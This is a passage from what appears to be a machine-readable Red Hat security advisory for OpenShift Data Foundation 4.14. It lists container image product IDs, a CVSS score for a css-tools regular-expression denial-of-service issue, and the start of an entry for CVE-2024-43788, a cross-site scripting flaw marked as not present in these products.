"9Base-RHODF-4.14:odf4/ocs-metrics-exporter-rhel9@sha256:cfbbab395069de17bb86357e54d2a6a89e5fe671b938b7a42e4c8ab1eb951e49_amd64", "9Base-RHODF-4.14:odf4/ocs-operator-bundle@sha256:3d161f9b4d88c502382b32abe4392af4a5b141fa11851f335f32745c090971a5_ppc64le", "9Base-RHODF-4.14:odf4/ocs-operator-bundle@sha256:a967f7349b22cc96c11191bf31c002ef6fec7fd4214398df29ecdb7c72d4718c_s390x", "9Base-RHODF-4.14:odf4/ocs-operator-bundle@sha256:b2cf0ade1d9c2e16e4fec4e2886691f5e4d95210bdf68377cd22aa6a3bd409d4_amd64", "9Base-RHODF-4.14:odf4/ocs-rhel9-operator@sha256:215778987ac0f6449b168481b84a8b253cd4577711055ca66d259fdbf37e9af9_s390x", "9Base-RHODF-4.14:odf4/ocs-rhel9-operator@sha256:60b08d3094ed01d2e5570973964f08cd9a81c794b1e187d595dc735436004cc2_arm64", "9Base-RHODF-4.14:odf4/ocs-rhel9-operator@sha256:7c98d7e882e06d09322f9eefcd67a26a9b96e81708a1c2d9095c93e280bee66a_amd64", "9Base-RHODF-4.14:odf4/ocs-rhel9-operator@sha256:e81785d999d583b8a57e6be3eecc7edfa042552e4ae0c2a18460316a68828fb1_ppc64le", "9Base-RHODF-4.14:odf4/odf-console-rhel9@sha256:521022da39600a31fd4f1e3f72cfbc5c9315a53de21df57be71a63e4050a4491_ppc64le", "9Base-RHODF-4.14:odf4/odf-console-rhel9@sha256:88ddde7411b0ce4b0edd53e0b64c76afa8038fc4a8aa1450220e515759c30036_amd64", "9Base-RHODF-4.14:odf4/odf-console-rhel9@sha256:9c676d4cea288ae80afe61e6c2c2009da9969508aebd8eebce0f21513ba505f9_s390x", "9Base-RHODF-4.14:odf4/odf-cosi-sidecar-rhel9@sha256:7bd34f3be6e5a6e689ede195ef1b29843b5eb0cf839021816c7e57819b0d496e_s390x", "9Base-RHODF-4.14:odf4/odf-cosi-sidecar-rhel9@sha256:cada6c55b8adbafd7238399b13748432b4e2937eb5aa7b1c0d40573983f4b953_amd64", "9Base-RHODF-4.14:odf4/odf-cosi-sidecar-rhel9@sha256:df2648d2c5f839bde961fe8e3badbaf6cf72c7b62c133b1cb27c4ee7e66ac5f0_ppc64le", "9Base-RHODF-4.14:odf4/odf-csi-addons-operator-bundle@sha256:b16ddba3e229faf0aa5d01f0dd6452872c6a44679a74359979a9c09c595bbcc8_s390x", "9Base-RHODF-4.14:odf4/odf-csi-addons-operator-bundle@sha256:c4b1229ac6308e623a660b37b3f52870eac8c9566d2068173ffadc52aee8da12_ppc64le", "9Base-RHODF-4.14:odf4/odf-csi-addons-operator-bundle@sha256:ef593bb97792c40a0706924dbfbc9dd0072d0889b92678b8ebaf55227d66f5a4_amd64", "9Base-RHODF-4.14:odf4/odf-csi-addons-rhel9-operator@sha256:326cb06c987e275b1c1c7c9fef1e96d343223ee150ed3c58cfc42ccf4765fe03_ppc64le", "9Base-RHODF-4.14:odf4/odf-csi-addons-rhel9-operator@sha256:3366ad94a8cba707735d4cbbc692221b62a5fbef387edb70e3660f55ae718e7a_arm64", "9Base-RHODF-4.14:odf4/odf-csi-addons-rhel9-operator@sha256:ccd9cdb192b4275b9c7bb58b72df90df0ad6ff807e2f00ed04710655042f66d5_amd64", "9Base-RHODF-4.14:odf4/odf-csi-addons-rhel9-operator@sha256:f3ab303fdafcbef708c92a33ad0775fdae4744735ae600e7aa692e62a7fade10_s390x", "9Base-RHODF-4.14:odf4/odf-csi-addons-sidecar-rhel9@sha256:09d88b10bd0e674f5d0efae7b6a2d98db7634e2b594a44dbdae35d6a872fb0c0_amd64", "9Base-RHODF-4.14:odf4/odf-csi-addons-sidecar-rhel9@sha256:4e2db57173669e54f65196c175d5e47e74076d8164f57f90da86fcef8aa92281_arm64", "9Base-RHODF-4.14:odf4/odf-csi-addons-sidecar-rhel9@sha256:5d8e98b7f5b07f77e707cf73673dcf4648624da51d34d561d6bdc2b3fde8f541_s390x", "9Base-RHODF-4.14:odf4/odf-csi-addons-sidecar-rhel9@sha256:bac9dfa4b2d31316e0fcabc3e2c87c830c7e410d0b9c0e485ae62ea4da79d2c4_ppc64le", "9Base-RHODF-4.14:odf4/odf-multicluster-console-rhel9@sha256:171817821112bd026a41faae5cf98fd06ed5d0cf063d622f24fa695bcb1213b4_amd64", "9Base-RHODF-4.14:odf4/odf-multicluster-console-rhel9@sha256:68c42668721898d68bc3b255bedca2124dee662626542793c9bfadc520d473c8_ppc64le", "9Base-RHODF-4.14:odf4/odf-multicluster-console-rhel9@sha256:85505b18dc32d34de3f9d6ca779acc84e8c500f106460502597f00fe8626509b_s390x", "9Base-RHODF-4.14:odf4/odf-multicluster-operator-bundle@sha256:11968f525a32bdd28d90ecc8b0eb32838c4eab155a77f0453685dc346f5c106d_amd64", "9Base-RHODF-4.14:odf4/odf-multicluster-operator-bundle@sha256:389291fcc275966724880ec3f8b6732020027e162e515684e889a76c686d8163_s390x", "9Base-RHODF-4.14:odf4/odf-multicluster-operator-bundle@sha256:73448db0de00c6a40ed20d0d167b7e98f89c8e3eebc45f675cc210e27bd95c0c_ppc64le", "9Base-RHODF-4.14:odf4/odf-multicluster-rhel9-operator@sha256:08bd33241646abb79e57a6de5aac3611f0f3238c11dfa76bd135e8fc745eaf97_ppc64le", "9Base-RHODF-4.14:odf4/odf-multicluster-rhel9-operator@sha256:2baf3d66710d7673ea20562912597b058a3d0a9b428bdf1ba792d0624c31f284_s390x", "9Base-RHODF-4.14:odf4/odf-multicluster-rhel9-operator@sha256:59e97364ffd0cf0b64f95cbb65dcfcac7d982bffc98dd87e64a5c0e0d114e36b_arm64", "9Base-RHODF-4.14:odf4/odf-multicluster-rhel9-operator@sha256:eb4626677b340ac11237dc9269071732b45642238afb3afdabe7acf535464fda_amd64", "9Base-RHODF-4.14:odf4/odf-must-gather-rhel9@sha256:1318f5f3119a2b9a5b22e7687d3b1d5212394dda2d95b6e02c98b8ffcb87660f_amd64", "9Base-RHODF-4.14:odf4/odf-must-gather-rhel9@sha256:722eadfcf62be37bf9d714ac4336440ed98615269423c3ba3b65b70b6c6acd29_arm64", "9Base-RHODF-4.14:odf4/odf-must-gather-rhel9@sha256:a0ef2966b464a5602ab2d936772dc74ca55212a11c0ec0f19db5ff61d66c2980_ppc64le", "9Base-RHODF-4.14:odf4/odf-must-gather-rhel9@sha256:d64b01bd4ace2795a62a7bfb2b385930e46f76eb12cede706d10b16ba0707750_s390x", "9Base-RHODF-4.14:odf4/odf-operator-bundle@sha256:26459b59f76a3e8cc6fed7907b044921fa61a27d91c3b174ea7f35d120d99a6e_ppc64le", "9Base-RHODF-4.14:odf4/odf-operator-bundle@sha256:4412748a0cf46c60539a4fefdc8390040a5c61fa8eee6137a8a402dcef9ddb01_amd64", "9Base-RHODF-4.14:odf4/odf-operator-bundle@sha256:b9c877af1b71bf3ec5f6025353c9d9b37e457e120ea0815c9090490a6b2217fd_s390x", "9Base-RHODF-4.14:odf4/odf-rhel9-operator@sha256:168d1924a17a77cc3a473bf48a90bfd3cb3134d30a667cbbf378fc96b3ad5803_amd64", "9Base-RHODF-4.14:odf4/odf-rhel9-operator@sha256:4a42286f3a5c31625fe29085c81627325006d6c1b63e8ad3c90b2bfa383b2439_s390x", "9Base-RHODF-4.14:odf4/odf-rhel9-operator@sha256:7609f4687626d3b178e211cc587b642acc688acd17274551bde6828ca5e702e5_ppc64le", "9Base-RHODF-4.14:odf4/odf-rhel9-operator@sha256:d1c814e55d7f91d8b096bf0983041e678ece0034fb3990630565ae32791d5d7c_arm64", "9Base-RHODF-4.14:odf4/odr-cluster-operator-bundle@sha256:91bf46b7a774f08aba77f25203cb4bfa2aa44073a50807b942190702c2364eff_s390x", "9Base-RHODF-4.14:odf4/odr-cluster-operator-bundle@sha256:a79234b0659b2e45b7661a7b86f658dedc01e7b9ff858251a26dab3a42650993_amd64", "9Base-RHODF-4.14:odf4/odr-cluster-operator-bundle@sha256:de86c539ff9dfe81d04cecee6fbd6ded1e8b4a3b598d855aa5c6baa98cf10d45_ppc64le", "9Base-RHODF-4.14:odf4/odr-hub-operator-bundle@sha256:14c3b888aff944bafe415da999e6c4d43f830f4ebe7bc1d681f92f0037751687_s390x", "9Base-RHODF-4.14:odf4/odr-hub-operator-bundle@sha256:2094cba9cbcf69f44a9176a5f8906f3faa95e0914272922311d0a9a28ca437bf_ppc64le", "9Base-RHODF-4.14:odf4/odr-hub-operator-bundle@sha256:ad8244e09fdbd18c7c9ee1bd398fbb36fbc403fba0e59553d037018351dba05d_amd64", "9Base-RHODF-4.14:odf4/odr-rhel9-operator@sha256:06b747af12530dd66554af69f072c35622fb57fbff9094b71dcc379ef13faa71_ppc64le", "9Base-RHODF-4.14:odf4/odr-rhel9-operator@sha256:6447bd5f6546704b4b8762c8c00dcd27141a0943fea33a02ee621087b4f353cf_s390x", "9Base-RHODF-4.14:odf4/odr-rhel9-operator@sha256:8be0734337b11f5bb35cdbd93dc3b93d37c66770b238bd26de673026ef201e62_arm64", "9Base-RHODF-4.14:odf4/odr-rhel9-operator@sha256:c49b2c30b19d5f0c13782910214819fc1a18b48c0f8a0d3064b2b4af24e1567f_amd64", "9Base-RHODF-4.14:odf4/rook-ceph-rhel9-operator@sha256:057af5f435a7ed786bdca3db5219fc58152dbe4e9afa997b91e5f6e930534025_amd64", "9Base-RHODF-4.14:odf4/rook-ceph-rhel9-operator@sha256:210ff59e38d274b3ad678b826078bdc896cb5f950ad2221724c03bda6939138b_ppc64le", "9Base-RHODF-4.14:odf4/rook-ceph-rhel9-operator@sha256:df1f250b1d40440eb8a5d97f3c2641f01b81d99fd67c42d14c6f89183f5486fd_s390x", ], }, ], scores: [ { cvss_v3: { attackComplexity: "LOW", attackVector: "NETWORK", availabilityImpact: "LOW", baseScore: 5.3, baseSeverity: "MEDIUM", confidentialityImpact: "NONE", integrityImpact: "NONE", privilegesRequired: "NONE", scope: "UNCHANGED", userInteraction: "NONE", vectorString: "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L", version: "3.1", }, products: [ "9Base-RHODF-4.14:odf4/cephcsi-rhel9@sha256:08a046ba8c5a9284e7fc9263f51eee40a5203c5d41c25ac2df555694dbd5a395_s390x", "9Base-RHODF-4.14:odf4/cephcsi-rhel9@sha256:6b2cb0576d635bfeef719847a6b3a651b5527a0336fe57548ae609025ddb2016_amd64", "9Base-RHODF-4.14:odf4/cephcsi-rhel9@sha256:984f5852a4793d9883106ccca492b1daab60d3c85f21ad667f92efbe8e5d1c50_ppc64le", "9Base-RHODF-4.14:odf4/mcg-cli-rhel9@sha256:0f8ea96fc58192660d845131c760a258a8e33fc02fc85884aa9be5ea07fd5e26_arm64", "9Base-RHODF-4.14:odf4/mcg-cli-rhel9@sha256:1f9ed27e2bd7b881aa5bc06571cf1cd459d577746e01f388bef01679013958f5_s390x", "9Base-RHODF-4.14:odf4/mcg-cli-rhel9@sha256:a665d06e0ec627db26cf47e0e19a36793f185fbf7dcb2a756983b0c08d041a09_ppc64le", "9Base-RHODF-4.14:odf4/mcg-cli-rhel9@sha256:e33c0ee4709e501d0a25c9da0089cb28b79ee80d28706465b55b9b17f807d260_amd64", "9Base-RHODF-4.14:odf4/mcg-core-rhel9@sha256:8d8230c10fa25e17fdac866971ecbdcec369e998f4f965eab27abab46d1eaf4d_amd64", "9Base-RHODF-4.14:odf4/mcg-core-rhel9@sha256:8dbb2f97682ab4a0f88e4b63485738f591a002faded8d1e5a01f918abd0a22b5_arm64", "9Base-RHODF-4.14:odf4/mcg-core-rhel9@sha256:bc5578e6f07cd0692abd897bf25b99361f1044a10ddcefefae13d3af338b3d58_ppc64le", "9Base-RHODF-4.14:odf4/mcg-core-rhel9@sha256:cf73fc2fa89884542a1f0e333bd9e1dd587a05e86442d67a316cd1c1d26c925d_s390x", "9Base-RHODF-4.14:odf4/mcg-operator-bundle@sha256:a42cd3a47eae7d05c44b438321da63faaee8274e4099171ec30c75005526f05d_ppc64le", "9Base-RHODF-4.14:odf4/mcg-operator-bundle@sha256:a73e671a9db5b88691800cefb2c903e7012499bc857e6cca62af958a35b5eab6_s390x", "9Base-RHODF-4.14:odf4/mcg-operator-bundle@sha256:f034e4be8b4e4e29ae79b12b800bf9ea682fa006a3ba6e84f42e06167a239750_amd64", "9Base-RHODF-4.14:odf4/mcg-rhel9-operator@sha256:0af9a6828abb53c18dae132b6a91862a85b5ad0b3f3ffbded002955af2fd04e2_s390x", "9Base-RHODF-4.14:odf4/mcg-rhel9-operator@sha256:1e20312fdd047dfd87b67d0bdc6a493df330c58671bcd0e078f22686df4a8d66_ppc64le", "9Base-RHODF-4.14:odf4/mcg-rhel9-operator@sha256:bb82af60a467551305c8628e6c8bac0b0d01637a0fb04b4142e69c90d3003434_arm64", "9Base-RHODF-4.14:odf4/mcg-rhel9-operator@sha256:fc98e8793dac5fcdb663967a7fd27c03d4cbb38295a5b1138f30cc1936bec92b_amd64", "9Base-RHODF-4.14:odf4/ocs-client-console-rhel9@sha256:3d2aba1307256ae6ee3a2dffaf0d175f7d204f7484712c1ec083d74203de2cb8_ppc64le", "9Base-RHODF-4.14:odf4/ocs-client-console-rhel9@sha256:5e05fc58b6b37b6e6f45a0042d3b167760fcc3dd5d14f4620a889d5feb90ae76_amd64", "9Base-RHODF-4.14:odf4/ocs-client-console-rhel9@sha256:f5976d4c7303ddb27dd91f33517af1e74cdf42e3539219c30c0c87408a085f95_s390x", "9Base-RHODF-4.14:odf4/ocs-client-operator-bundle@sha256:23aad767b433979e8465b4420278bf41a729e32530f80ef3bb3e98466afca95f_amd64", "9Base-RHODF-4.14:odf4/ocs-client-operator-bundle@sha256:3e398e98250d9638c8ad75bf88ae2cb936d499c1ebf0d0cc897ce37fbb25b42b_ppc64le", "9Base-RHODF-4.14:odf4/ocs-client-operator-bundle@sha256:59921e0c5c495c57a8efd9022b95bf0964fff99ba6f207cd49ed3b0112189f45_s390x", "9Base-RHODF-4.14:odf4/ocs-client-rhel9-operator@sha256:12fa0510c846a2f2d7984ab844faf117848aa9b70bf1642e140a20729fea3b4a_ppc64le", "9Base-RHODF-4.14:odf4/ocs-client-rhel9-operator@sha256:aeabac054147c3be143ddfcc48702332a58d17a31e461c1cf863fa273a5364e0_arm64", "9Base-RHODF-4.14:odf4/ocs-client-rhel9-operator@sha256:afcecc910feb27ffc8c48ce6aa52f2d305fd785b7a31e8d035d14f771f9993ae_amd64", "9Base-RHODF-4.14:odf4/ocs-client-rhel9-operator@sha256:f0fab98314e526b530a06a4859cab011647358ea65827288bd12d97ac1cf6e38_s390x", "9Base-RHODF-4.14:odf4/ocs-metrics-exporter-rhel9@sha256:06c5ad2463ba39e95ad251fd388b2c604deec27da05ef2c4d98952173eb56787_s390x", "9Base-RHODF-4.14:odf4/ocs-metrics-exporter-rhel9@sha256:9038bc5b6d2713e79672f2f574ebe849bb15dccc025a38fc2380e443430f05e6_ppc64le", "9Base-RHODF-4.14:odf4/ocs-metrics-exporter-rhel9@sha256:cfbbab395069de17bb86357e54d2a6a89e5fe671b938b7a42e4c8ab1eb951e49_amd64", "9Base-RHODF-4.14:odf4/ocs-operator-bundle@sha256:3d161f9b4d88c502382b32abe4392af4a5b141fa11851f335f32745c090971a5_ppc64le", "9Base-RHODF-4.14:odf4/ocs-operator-bundle@sha256:a967f7349b22cc96c11191bf31c002ef6fec7fd4214398df29ecdb7c72d4718c_s390x", "9Base-RHODF-4.14:odf4/ocs-operator-bundle@sha256:b2cf0ade1d9c2e16e4fec4e2886691f5e4d95210bdf68377cd22aa6a3bd409d4_amd64", "9Base-RHODF-4.14:odf4/ocs-rhel9-operator@sha256:215778987ac0f6449b168481b84a8b253cd4577711055ca66d259fdbf37e9af9_s390x", "9Base-RHODF-4.14:odf4/ocs-rhel9-operator@sha256:60b08d3094ed01d2e5570973964f08cd9a81c794b1e187d595dc735436004cc2_arm64", "9Base-RHODF-4.14:odf4/ocs-rhel9-operator@sha256:7c98d7e882e06d09322f9eefcd67a26a9b96e81708a1c2d9095c93e280bee66a_amd64", "9Base-RHODF-4.14:odf4/ocs-rhel9-operator@sha256:e81785d999d583b8a57e6be3eecc7edfa042552e4ae0c2a18460316a68828fb1_ppc64le", "9Base-RHODF-4.14:odf4/odf-console-rhel9@sha256:521022da39600a31fd4f1e3f72cfbc5c9315a53de21df57be71a63e4050a4491_ppc64le", "9Base-RHODF-4.14:odf4/odf-console-rhel9@sha256:88ddde7411b0ce4b0edd53e0b64c76afa8038fc4a8aa1450220e515759c30036_amd64", "9Base-RHODF-4.14:odf4/odf-console-rhel9@sha256:9c676d4cea288ae80afe61e6c2c2009da9969508aebd8eebce0f21513ba505f9_s390x", "9Base-RHODF-4.14:odf4/odf-cosi-sidecar-rhel9@sha256:7bd34f3be6e5a6e689ede195ef1b29843b5eb0cf839021816c7e57819b0d496e_s390x", "9Base-RHODF-4.14:odf4/odf-cosi-sidecar-rhel9@sha256:cada6c55b8adbafd7238399b13748432b4e2937eb5aa7b1c0d40573983f4b953_amd64", "9Base-RHODF-4.14:odf4/odf-cosi-sidecar-rhel9@sha256:df2648d2c5f839bde961fe8e3badbaf6cf72c7b62c133b1cb27c4ee7e66ac5f0_ppc64le", "9Base-RHODF-4.14:odf4/odf-csi-addons-operator-bundle@sha256:b16ddba3e229faf0aa5d01f0dd6452872c6a44679a74359979a9c09c595bbcc8_s390x", "9Base-RHODF-4.14:odf4/odf-csi-addons-operator-bundle@sha256:c4b1229ac6308e623a660b37b3f52870eac8c9566d2068173ffadc52aee8da12_ppc64le", "9Base-RHODF-4.14:odf4/odf-csi-addons-operator-bundle@sha256:ef593bb97792c40a0706924dbfbc9dd0072d0889b92678b8ebaf55227d66f5a4_amd64", "9Base-RHODF-4.14:odf4/odf-csi-addons-rhel9-operator@sha256:326cb06c987e275b1c1c7c9fef1e96d343223ee150ed3c58cfc42ccf4765fe03_ppc64le", "9Base-RHODF-4.14:odf4/odf-csi-addons-rhel9-operator@sha256:3366ad94a8cba707735d4cbbc692221b62a5fbef387edb70e3660f55ae718e7a_arm64", "9Base-RHODF-4.14:odf4/odf-csi-addons-rhel9-operator@sha256:ccd9cdb192b4275b9c7bb58b72df90df0ad6ff807e2f00ed04710655042f66d5_amd64", "9Base-RHODF-4.14:odf4/odf-csi-addons-rhel9-operator@sha256:f3ab303fdafcbef708c92a33ad0775fdae4744735ae600e7aa692e62a7fade10_s390x", "9Base-RHODF-4.14:odf4/odf-csi-addons-sidecar-rhel9@sha256:09d88b10bd0e674f5d0efae7b6a2d98db7634e2b594a44dbdae35d6a872fb0c0_amd64", "9Base-RHODF-4.14:odf4/odf-csi-addons-sidecar-rhel9@sha256:4e2db57173669e54f65196c175d5e47e74076d8164f57f90da86fcef8aa92281_arm64", "9Base-RHODF-4.14:odf4/odf-csi-addons-sidecar-rhel9@sha256:5d8e98b7f5b07f77e707cf73673dcf4648624da51d34d561d6bdc2b3fde8f541_s390x", "9Base-RHODF-4.14:odf4/odf-csi-addons-sidecar-rhel9@sha256:bac9dfa4b2d31316e0fcabc3e2c87c830c7e410d0b9c0e485ae62ea4da79d2c4_ppc64le", "9Base-RHODF-4.14:odf4/odf-multicluster-console-rhel9@sha256:171817821112bd026a41faae5cf98fd06ed5d0cf063d622f24fa695bcb1213b4_amd64", "9Base-RHODF-4.14:odf4/odf-multicluster-console-rhel9@sha256:68c42668721898d68bc3b255bedca2124dee662626542793c9bfadc520d473c8_ppc64le", "9Base-RHODF-4.14:odf4/odf-multicluster-console-rhel9@sha256:85505b18dc32d34de3f9d6ca779acc84e8c500f106460502597f00fe8626509b_s390x", "9Base-RHODF-4.14:odf4/odf-multicluster-operator-bundle@sha256:11968f525a32bdd28d90ecc8b0eb32838c4eab155a77f0453685dc346f5c106d_amd64", "9Base-RHODF-4.14:odf4/odf-multicluster-operator-bundle@sha256:389291fcc275966724880ec3f8b6732020027e162e515684e889a76c686d8163_s390x", "9Base-RHODF-4.14:odf4/odf-multicluster-operator-bundle@sha256:73448db0de00c6a40ed20d0d167b7e98f89c8e3eebc45f675cc210e27bd95c0c_ppc64le", "9Base-RHODF-4.14:odf4/odf-multicluster-rhel9-operator@sha256:08bd33241646abb79e57a6de5aac3611f0f3238c11dfa76bd135e8fc745eaf97_ppc64le", "9Base-RHODF-4.14:odf4/odf-multicluster-rhel9-operator@sha256:2baf3d66710d7673ea20562912597b058a3d0a9b428bdf1ba792d0624c31f284_s390x", "9Base-RHODF-4.14:odf4/odf-multicluster-rhel9-operator@sha256:59e97364ffd0cf0b64f95cbb65dcfcac7d982bffc98dd87e64a5c0e0d114e36b_arm64", "9Base-RHODF-4.14:odf4/odf-multicluster-rhel9-operator@sha256:eb4626677b340ac11237dc9269071732b45642238afb3afdabe7acf535464fda_amd64", "9Base-RHODF-4.14:odf4/odf-must-gather-rhel9@sha256:1318f5f3119a2b9a5b22e7687d3b1d5212394dda2d95b6e02c98b8ffcb87660f_amd64", "9Base-RHODF-4.14:odf4/odf-must-gather-rhel9@sha256:722eadfcf62be37bf9d714ac4336440ed98615269423c3ba3b65b70b6c6acd29_arm64", "9Base-RHODF-4.14:odf4/odf-must-gather-rhel9@sha256:a0ef2966b464a5602ab2d936772dc74ca55212a11c0ec0f19db5ff61d66c2980_ppc64le", "9Base-RHODF-4.14:odf4/odf-must-gather-rhel9@sha256:d64b01bd4ace2795a62a7bfb2b385930e46f76eb12cede706d10b16ba0707750_s390x", "9Base-RHODF-4.14:odf4/odf-operator-bundle@sha256:26459b59f76a3e8cc6fed7907b044921fa61a27d91c3b174ea7f35d120d99a6e_ppc64le", "9Base-RHODF-4.14:odf4/odf-operator-bundle@sha256:4412748a0cf46c60539a4fefdc8390040a5c61fa8eee6137a8a402dcef9ddb01_amd64", "9Base-RHODF-4.14:odf4/odf-operator-bundle@sha256:b9c877af1b71bf3ec5f6025353c9d9b37e457e120ea0815c9090490a6b2217fd_s390x", "9Base-RHODF-4.14:odf4/odf-rhel9-operator@sha256:168d1924a17a77cc3a473bf48a90bfd3cb3134d30a667cbbf378fc96b3ad5803_amd64", "9Base-RHODF-4.14:odf4/odf-rhel9-operator@sha256:4a42286f3a5c31625fe29085c81627325006d6c1b63e8ad3c90b2bfa383b2439_s390x", "9Base-RHODF-4.14:odf4/odf-rhel9-operator@sha256:7609f4687626d3b178e211cc587b642acc688acd17274551bde6828ca5e702e5_ppc64le", "9Base-RHODF-4.14:odf4/odf-rhel9-operator@sha256:d1c814e55d7f91d8b096bf0983041e678ece0034fb3990630565ae32791d5d7c_arm64", "9Base-RHODF-4.14:odf4/odr-cluster-operator-bundle@sha256:91bf46b7a774f08aba77f25203cb4bfa2aa44073a50807b942190702c2364eff_s390x", "9Base-RHODF-4.14:odf4/odr-cluster-operator-bundle@sha256:a79234b0659b2e45b7661a7b86f658dedc01e7b9ff858251a26dab3a42650993_amd64", "9Base-RHODF-4.14:odf4/odr-cluster-operator-bundle@sha256:de86c539ff9dfe81d04cecee6fbd6ded1e8b4a3b598d855aa5c6baa98cf10d45_ppc64le", "9Base-RHODF-4.14:odf4/odr-hub-operator-bundle@sha256:14c3b888aff944bafe415da999e6c4d43f830f4ebe7bc1d681f92f0037751687_s390x", "9Base-RHODF-4.14:odf4/odr-hub-operator-bundle@sha256:2094cba9cbcf69f44a9176a5f8906f3faa95e0914272922311d0a9a28ca437bf_ppc64le", "9Base-RHODF-4.14:odf4/odr-hub-operator-bundle@sha256:ad8244e09fdbd18c7c9ee1bd398fbb36fbc403fba0e59553d037018351dba05d_amd64", "9Base-RHODF-4.14:odf4/odr-rhel9-operator@sha256:06b747af12530dd66554af69f072c35622fb57fbff9094b71dcc379ef13faa71_ppc64le", "9Base-RHODF-4.14:odf4/odr-rhel9-operator@sha256:6447bd5f6546704b4b8762c8c00dcd27141a0943fea33a02ee621087b4f353cf_s390x", "9Base-RHODF-4.14:odf4/odr-rhel9-operator@sha256:8be0734337b11f5bb35cdbd93dc3b93d37c66770b238bd26de673026ef201e62_arm64", "9Base-RHODF-4.14:odf4/odr-rhel9-operator@sha256:c49b2c30b19d5f0c13782910214819fc1a18b48c0f8a0d3064b2b4af24e1567f_amd64", "9Base-RHODF-4.14:odf4/rook-ceph-rhel9-operator@sha256:057af5f435a7ed786bdca3db5219fc58152dbe4e9afa997b91e5f6e930534025_amd64", "9Base-RHODF-4.14:odf4/rook-ceph-rhel9-operator@sha256:210ff59e38d274b3ad678b826078bdc896cb5f950ad2221724c03bda6939138b_ppc64le", "9Base-RHODF-4.14:odf4/rook-ceph-rhel9-operator@sha256:df1f250b1d40440eb8a5d97f3c2641f01b81d99fd67c42d14c6f89183f5486fd_s390x", ], }, ], threats: [ { category: "impact", details: "Moderate", }, ], title: "css-tools: Improper Input Validation causes Denial of Service via Regular Expression", }, { cve: "CVE-2024-43788", cwe: { id: "CWE-79", name: "Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')", }, discovery_date: "2024-08-27T17:20:06.890123+00:00", flags: [ { label: "vulnerable_code_not_present", product_ids: [ "9Base-RHODF-4.14:odf4/cephcsi-rhel9@sha256:08a046ba8c5a9284e7fc9263f51eee40a5203c5d41c25ac2df555694dbd5a395_s390x", "9Base-RHODF-4.14:odf4/cephcsi-rhel9@sha256:6b2cb0576d635bfeef719847a6b3a651b5527a0336fe57548ae609025ddb2016_amd64", "9Base-RHODF-4.14:odf4/cephcsi-rhel9@sha256:984f5852a4793d9883106ccca492b1daab60d3c85f21ad667f92efbe8e5d1c50_ppc64le", "9Base-RHODF-4.14:odf4/mcg-cli-rhel9@sha256:0f8ea96fc58192660d845131c760a258a8e33fc02fc85884aa9be5ea07fd5e26_arm64", "9Base-RHODF-4.14:odf4/mcg-cli-rhel9@sha256:1f9ed27e2bd7b881aa5bc06571cf1cd459d577746e01f388bef01679013958f5_s390x", "9Base-RHODF-4.14:odf4/mcg-cli-rhel9@sha256:a665d06e0ec627db26cf47e0e19a36793f185fbf7dcb2a756983b0c08d041a09_ppc64le", "9Base-RHODF-4.14:odf4/mcg-cli-rhel9@sha256:e33c0ee4709e501d0a25c9da0089cb28b79ee80d28706465b55b9b17f807d260_amd64", "9Base-RHODF-4.14:odf4/mcg-core-rhel9@sha256:8d8230c10fa25e17fdac866971ecbdcec369e998f4f965eab27abab46d1eaf4d_amd64", "9Base-RHODF-4.14:odf4/mcg-core-rhel9@sha256:8dbb2f97682ab4a0f88e4b63485738f591a002faded8d1e5a01f918abd0a22b5_arm64", "9Base-RHODF-4.14:odf4/mcg-core-rhel9@sha256:bc5578e6f07cd0692abd897bf25b99361f1044a10ddcefefae13d3af338b3d58_ppc64le", "9Base-RHODF-4.14:odf4/mcg-core-rhel9@sha256:cf73fc2fa89884542a1f0e333bd9e1dd587a05e86442d67a316cd1c1d26c925d_s390x", "9Base-RHODF-4.14:odf4/mcg-operator-bundle@sha256:a42cd3a47eae7d05c44b438321da63faaee8274e4099171ec30c75005526f05d_ppc64le", "9Base-RHODF-4.14:odf4/mcg-operator-bundle@sha256:a73e671a9db5b88691800cefb2c903e7012499bc857e6cca62af958a35b5eab6_s390x", "9Base-RHODF-4.14:odf4/mcg-operator-bundle@sha256:f034e4be8b4e4e29ae79b12b800bf9ea682fa006a3ba6e84f42e06167a239750_amd64", "9Base-RHODF-4.14:odf4/mcg-rhel9-operator@sha256:0af9a6828abb53c18dae132b6a91862a85b5ad0b3f3ffbded002955af2fd04e2_s390x", "9Base-RHODF-4.14:odf4/mcg-rhel9-operator@sha256:1e20312fdd047dfd87b67d0bdc6a493df330c58671bcd0e078f22686df4a8d66_ppc64le", "9Base-RHODF-4.14:odf4/mcg-rhel9-operator@sha256:bb82af60a467551305c8628e6c8bac0b0d01637a0fb04b4142e69c90d3003434_arm64", "9Base-RHODF-4.14:odf4/mcg-rhel9-operator@sha256:fc98e8793dac5fcdb663967a7fd27c03d4cbb38295a5b1138f30cc1936bec92b_amd64", "9Base-RHODF-4.14:odf4/ocs-client-console-rhel9@sha256:3d2aba1307256ae6ee3a2dffaf0d175f7d204f7484712c1ec083d74203de2cb8_ppc64le", "9Base-RHODF-4.14:odf4/ocs-client-console-rhel9@sha256:5e05fc58b6b37b6e6f45a0042d3b167760fcc3dd5d14f4620a889d5feb90ae76_amd64", "9Base-RHODF-4.14:odf4/ocs-client-console-rhel9@sha256:f5976d4c7303ddb27dd91f33517af1e74cdf42e3539219c30c0c87408a085f95_s390x", "9Base-RHODF-4.14:odf4/ocs-client-operator-bundle@sha256:23aad767b433979e8465b4420278bf41a729e32530f80ef3bb3e98466afca95f_amd64", "9Base-RHODF-4.14:odf4/ocs-client-operator-bundle@sha256:3e398e98250d9638c8ad75bf88ae2cb936d499c1ebf0d0cc897ce37fbb25b42b_ppc64le", "9Base-RHODF-4.14:odf4/ocs-client-operator-bundle@sha256:59921e0c5c495c57a8efd9022b95bf0964fff99ba6f207cd49ed3b0112189f45_s390x", "9Base-RHODF-4.14:odf4/ocs-client-rhel9-operator@sha256:12fa0510c846a2f2d7984ab844faf117848aa9b70bf1642e140a20729fea3b4a_ppc64le", "9Base-RHODF-4.14:odf4/ocs-client-rhel9-operator@sha256:aeabac054147c3be143ddfcc48702332a58d17a31e461c1cf863fa273a5364e0_arm64", "9Base-RHODF-4.14:odf4/ocs-client-rhel9-operator@sha256:afcecc910feb27ffc8c48ce6aa52f2d305fd785b7a31e8d035d14f771f9993ae_amd64", "9Base-RHODF-4.14:odf4/ocs-client-rhel9-operator@sha256:f0fab98314e526b530a06a4859cab011647358ea65827288bd12d97ac1cf6e38_s390x", 